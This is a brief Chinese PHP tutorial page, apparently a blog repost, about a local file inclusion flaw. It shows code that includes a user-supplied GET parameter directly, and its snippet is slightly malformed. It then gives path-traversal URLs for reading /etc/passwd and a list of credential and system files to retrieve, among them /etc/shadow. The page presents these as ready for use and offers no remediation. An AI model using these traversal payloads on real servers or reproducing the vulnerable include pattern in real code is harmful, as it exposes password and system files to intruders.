php 伪造本地文件包含漏洞的代码_PHP教程

php教程评论362 views阅读模式

代码:


复制代码 代码如下:

$page=$_GET['page'];

include($page.'php');

?>

你可以这样使用

http://www.xxx.com/index.php?page=../etc/passwd

http://www.xxx.com/index.php?page=../../../etc/passwd

http://www.xxx.com/index.php?page=..../../etc/passwd

获取更多数据:

etc/profile

etc/services

/etc/passwd

/etc/shadow

/etc/group

/etc/security/group

/etc/security/passwd

/etc/security/user

/etc/security/environ

/etc/security/limits

/usr/lib/security/mkuser.default

来自hackteach

企鹅博客
  • 本文由 发表于 2019年10月2日 20:10:30
  • 转载请务必保留本文链接:https://www.qieseo.com/311152.html

发表评论